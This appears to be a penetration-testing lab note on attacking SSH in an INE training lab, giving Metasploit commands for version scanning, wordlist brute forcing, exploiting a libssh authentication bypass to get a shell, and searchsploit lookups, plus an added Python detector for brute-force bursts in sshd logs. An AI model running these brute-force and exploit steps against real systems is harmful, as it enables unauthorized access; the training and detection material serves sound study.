# Port 22 SSH

### SSH Enumeration

#### Version Enumeration with Metasploit

```
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS demo.ine.local
exploit
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FZktcOTHCX1OWmAu2JSFa%2Fimage.png?alt=media&#x26;token=fea4aae1-0910-408b-9e5c-60ed131eb5c6" alt=""><figcaption></figcaption></figure>

### Bruteforce SSH

#### Metasploit SSH bruteforcing

We will now use the `ssh_login` module to find valid credentials for the SSH server.

```
use auxiliary/scanner/ssh/ssh_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
set STOP_ON_SUCCESS true
set VERBOSE true
exploit
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FcM5y6faDDX3zZ72APzeu%2Fimage.png?alt=media&#x26;token=6e7fa289-979c-4269-857a-2ac5928b68d9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F5CvFpibnAFPkH6cEMagD%2Fimage.png?alt=media&#x26;token=f2e7fedd-772b-44ae-a2fc-edb7c2bb5dd0" alt=""><figcaption></figcaption></figure>
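The same run seen from the server side, as an added example that is not part of the original notes: a small detector that flags a source producing a burst of failed password attempts across several usernames, and records any login accepted from that source while the burst is still in progress. It assumes the server logs in OpenSSH's sshd syslog format; the log lines, IP addresses, thresholds and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in OpenSSH sshd syslog format (not captured from the lab).
SAMPLE_LOG = """\
Dec 14 20:25:01 demo sshd[1201]: Failed password for invalid user admin from 192.0.2.10 port 40022 ssh2
Dec 14 20:25:01 demo sshd[1203]: Failed password for root from 192.0.2.10 port 40024 ssh2
Dec 14 20:25:02 demo sshd[1205]: Failed password for invalid user test from 192.0.2.10 port 40026 ssh2
Dec 14 20:25:02 demo sshd[1207]: Failed password for invalid user guest from 192.0.2.10 port 40028 ssh2
Dec 14 20:25:03 demo sshd[1209]: Failed password for jackie from 192.0.2.10 port 40030 ssh2
Dec 14 20:25:04 demo sshd[1211]: Accepted password for jackie from 192.0.2.10 port 40032 ssh2
Dec 14 20:31:10 demo sshd[1300]: Failed password for alice from 198.51.100.7 port 51500 ssh2
Dec 14 20:31:18 demo sshd[1302]: Accepted password for alice from 198.51.100.7 port 51502 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse(log, year=2025):
    """Yield (timestamp, result, user, source_ip) for each password auth line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog timestamps carry no year, so the caller supplies one
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect(log, max_failures=5, window=timedelta(seconds=60)):
    """Return {ip: {"users": set, "accepted": user or None}} for noisy sources."""
    recent = defaultdict(list)  # ip -> [(ts, user)] failures still inside the window
    alerts = {}
    for ts, result, user, ip in parse(log):
        recent[ip] = [(t, u) for t, u in recent[ip] if ts - t <= window]
        if result == "Failed":
            recent[ip].append((ts, user))
            if len(recent[ip]) >= max_failures:
                alert = alerts.setdefault(ip, {"users": set(), "accepted": None})
                alert["users"].update(u for _, u in recent[ip])
        elif ip in alerts and recent[ip]:
            # A login accepted in the middle of a guessing burst: treat the
            # account as compromised and rotate its password.
            alerts[ip]["accepted"] = user
    return alerts

if __name__ == "__main__":
    for ip, alert in detect(SAMPLE_LOG).items():
        print(ip, sorted(alert["users"]), "accepted:", alert["accepted"])
```

A single mistyped password followed by a successful login, like the second source in the sample, stays below the threshold and raises no alert.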

### SSH Exploitation

```
┌──(root㉿INE)-[~]
└─# nmap -sS -sV --script=vuln  demo.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-14 20:21 IST
Nmap scan report for demo.ine.local (192.148.44.3)
Host is up (0.000028s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     libssh 0.8.3 (protocol 2.0)
MAC Address: 02:42:C0:94:2C:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2Fy3QpSUsPwv3iJDPcHPNT%2Fimage.png?alt=media&#x26;token=7ea4ed84-bc22-4b51-9f06-eb26120f64e2" alt=""><figcaption></figcaption></figure>

#### Exploiting libssh with Metasploit

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*a4yCCtfJkSgQ_Ht0F8BxyQ.png" alt="" height="213" width="700"><figcaption></figcaption></figure>

Metasploit has an exploit for this. In the same module, there are both auxiliary scans and the exploit itself. Since we need to exploit it, let’s first check the available options.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*-wJzvYGW6woDOvci7qxqZQ.png" alt="" height="249" width="700"><figcaption></figcaption></figure>

For this exploit, we only need to set two parameters: `RHOSTS` and `SPAWN_PTY`. In the auxiliary section, we can confirm that it will directly spawn a shell once executed.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*wykcW2O5OTNXIu9m_eEZLQ.png" alt="" height="81" width="700"><figcaption></figcaption></figure>

After setting the parameters, type `exploit` to execute the exploit and gain access to the shell.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*YyJfrvZVt03H1W6G9pXlkg.png" alt="" height="89" width="700"><figcaption></figcaption></figure>

As the output shows, the session has been created and opened. To verify, type the following command: `sessions`

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*lQOkS2n53ap-NgDGqs34fA.png" alt="" height="91" width="700"><figcaption></figcaption></figure>

To use this session, type `sessions -i 2`. This will successfully grant us access to the shell.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*KGzUhqEMg9eVHlgRDzTs7g.png" alt="" height="174" width="700"><figcaption></figcaption></figure>

#### OpenSSH Exploits

Given that we have obtained the exact version of OpenSSH running on the target system, we can utilize Searchsploit to search for exploits that affect this specific version of OpenSSH.

This can be done by running the following command:

```
searchsploit OpenSSH 7.1
```

As shown in the following screenshot, Searchsploit reveals various username enumeration scripts that can be used to enumerate user accounts.

<figure><img src="https://assets.ine.com/lab/learningpath/e26e012200b301f513488057ac6a5fea53bcce71db0d9f7fbde5f0f78e97f713.png" alt=""><figcaption></figcaption></figure>

We can use these scripts to enumerate user accounts on the target system. We have already identified one user account that can also be used to authenticate with the OpenSSH server.

### Metasploit SSH login

```
use auxiliary/scanner/ssh/ssh_login
set RHOSTS demo.ine.local
set USERNAME jackie
set PASSWORD password
exploit
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FBPn8F1FCoMEF39Hr6LJg%2Fimage.png?alt=media&#x26;token=39d1d632-d7c6-4999-a3a4-8a042989f2e1" alt=""><figcaption></figcaption></figure>
